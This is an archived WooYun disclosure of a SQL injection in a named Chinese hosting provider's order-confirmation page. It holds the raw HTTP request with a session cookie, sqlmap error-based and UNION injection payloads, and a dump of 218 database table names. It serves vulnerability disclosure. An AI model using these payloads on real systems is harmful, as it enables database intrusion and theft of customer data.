乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-03: 细节已通知厂商并且等待厂商处理中 2015-09-08: 厂商已经主动忽略漏洞,细节向公众公开
POST /Host/confirm.aspx HTTP/1.1Content-Length: 201Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://new.edong.com:80/Cookie: ASP.NET_SessionId=rf5ns3hlt43wmqwzsyd5tdxu; temp_user=sessionkey=temp_VacvlX3sMonakVQcHost: new.edong.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*buytype=1&dbspace=0&dbspaceproductid=0&languageid=1&lineid=1&period=0&periodtype=0&price=0&productid=0"a=0"aproductid=0&traffic=0&trafficproductid=0&typeid=2
sqlmap resumed the following injection point(s) from stored session:---Parameter: languageid (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: buytype=1&dbspace=0&dbspaceproductid=0&languageid=1 AND 6821=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(98)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (6821=6821) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(112)+CHAR(113)))&lineid=1&period=0&periodtype=0&price=0&productid=0"a=0"aproductid=0&traffic=0&trafficproductid=0&typeid=2 Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: buytype=1&dbspace=0&dbspaceproductid=0&languageid=1 UNION ALL SELECT CHAR(113)+CHAR(107)+CHAR(98)+CHAR(107)+CHAR(113)+CHAR(74)+CHAR(120)+CHAR(107)+CHAR(72)+CHAR(101)+CHAR(115)+CHAR(80)+CHAR(122)+CHAR(78)+CHAR(81)+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(112)+CHAR(113),NULL,NULL,NULL-- &lineid=1&period=0&periodtype=0&price=0&productid=0"a=0"aproductid=0&traffic=0&trafficproductid=0&typeid=2---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NETback-end DBMS: Microsoft SQL Server 2008Database: biz[218 tables]+----------------------------------------+| AccountDPIList || Account_Account_Level_View || Account_info || Answer_View || Biz_Account_Agent || Biz_Account_Agent || Biz_Account_financial || Biz_Invoice || Biz_InvoiceTemplate || Biz_Mail_Type || Biz_Server_Type_Para || Biz_ShoppingCart_Para || Biz_ShoppingCart_Para || Biz_Vhost_Web_ISAPI || Biz_Vhost_Web_ISAPI || Biz_Vhost_Web_Mime || Contact_Default || ControlTobizOrderpara || DomainTempleteList || Domain_Out_Contacts || DomainsChangeAccount_View || Domains_Para_View || Domains_Redemption_View || Domains_Register_View || Domains_Trans_In_View || Domains_Trans_Out_View || GetDomainsDNS || GetDomains_productClass || GetProductClassName || Group_Group_Sub_SeverInfo_View || HelpModuleAndInfo_View || HostChangeAccount_View || HostList_View || Host_Ftp_Domains_View || Host_Open_Account_Level_View || Host_Open_View || Industry_select_Control || InvoiceAccountList_View2 || MailProduct_View || OnlinePaymentList_View || OrderDetailInfo || OrderList || OrderOperation_View || Print_Order || ProductPrice_Account_Level_View || Product_ProductClass_View || Product_SalesScope_Account_Level_View || QuestionForBusiness_View || Question_View || ServerInfo_Server_Para_View || Sys_IpRange || Task_Host_UpZip_Log_View || Template || VirtualHostList_View || VirtualHost_Product_Hsot_Relation_View || bizProductClass || bizProduct_SalesScope || bizProduct_Spec || biz_AccountLevel_Relation || biz_Account_ConsumerRecords || biz_Account_DPI || biz_Account_Email || biz_Account_Login || biz_Account_MailInform || biz_Account_MailInform || biz_Account_Message || biz_Account_NewsNotice || biz_Account_SMS || biz_Account_invoice || biz_Account_level || biz_Account_supplement || biz_Answer || biz_BackGround || biz_Billing_Template || biz_BreakDown || biz_DNS_Line || biz_DNS_Line || biz_DNS_Log || biz_DNS_Sub || biz_DepartMent || biz_Domain_Out_Contacts || biz_DomainsParas || biz_Domains_DNS || biz_Group_Sub || biz_Group_Sub || biz_Hardware || biz_Host_Language || biz_Host_LineType || biz_Host_Open_Maintain || biz_Host_Open_Maintain || biz_Host_Open_Para || biz_Host_Type || biz_IDCIP || biz_IDCServer || biz_IDCServerSpec || biz_IDCService_Operation || biz_IDCVLAN || biz_IDC_Cabinet || biz_IDC_PortAndBroad || biz_IDC_Relation_CabinetToPort || biz_IDC_Relation_PortToVLan || biz_Line_Type || biz_Mail_Product || biz_OnlinePayment || biz_Product_Host_Type || biz_Product_Host_Type || biz_Product_Hsot_Relation || biz_Product_Promo || biz_ProoductToMemberLevel || biz_QuestionForBusiness || biz_QuestionForBusiness || biz_QuestionForProduct || biz_QuestionLog || biz_RelationQuestionToDepart || biz_RelationVHostToIP || biz_Relation_HostToDomain || biz_Relation_Order_Sales || biz_Server_Connection || biz_Server_IP || biz_Server_Info || biz_Server_Para || biz_Task_Host_UpZip_Log || biz_Task_Host_UpZip_Log || biz_Task_Host_UpZip_Log || biz_VHostToService || biz_VHost_FTP || biz_Vhost_DB || biz_Vhost_Mail_Detail || biz_Vhost_Mail_Detail || biz_Vhost_Web_Para || biz_VirtualHost || biz_domain_log || biz_domains_Redemption || biz_domains_change_account || biz_domains_change_account || biz_domains_change_param || biz_domains_change_register || biz_domains_para || biz_domains_register || biz_domains_trans_in || biz_domains_trans_out || biz_host_change_account || biz_idcrooms || biz_job_description || biz_order_operation || biz_order_operation || biz_order_para || biz_order_sub || biz_productPrice_change || biz_productPrice_change || biz_product_interface || biz_product_tactics_open || biz_product_tactics_open || biz_productpackages_detail || biz_productpackages_detail || biz_productprice_off || biz_transcation_para || biz_transcation_para || biz_work_order || domain_para_sub || domain_register_info || financialControl_ClassName || financialControl_ClassName || help_Info || help_MainMenu || help_ModuleAndInfo || help_ModuleAndInfo || help_SecondaryMenu || help_ThreeMenu || help_View || job_select_Control || log_InOut || log_operatiom || log_sys || newsinfo || questionLog_view || relation_ordertoInvoice || rolefun || roles || s_Account || s_AccountToRole || s_Buttons || s_Menus || s_Permission || s_Role || select_Control || sys_Account_mantainance || sys_Account_mantainance || sys_Area_1 || sys_Area_1 || sys_Button || sys_City || sys_Country || sys_Favorite || sys_IP_Property || sys_Menus || sys_Privilege || sys_Province || sys_control || sys_dept || sys_domain_interface || sys_duty || sys_info_from || sys_interface_domain || sys_para || sys_purview || sys_role || sys_roletopurview || sys_supplement_interface || sys_tactics_price || sys_tatics_open || sys_user || sys_userrole || sysdiagrams || t_log_dns || userfun || userinfo || v_user |+----------------------------------------+
危害等级:无影响厂商忽略
忽略时间:2015-09-08 08:58
漏洞Rank:4 (WooYun评价)
暂无
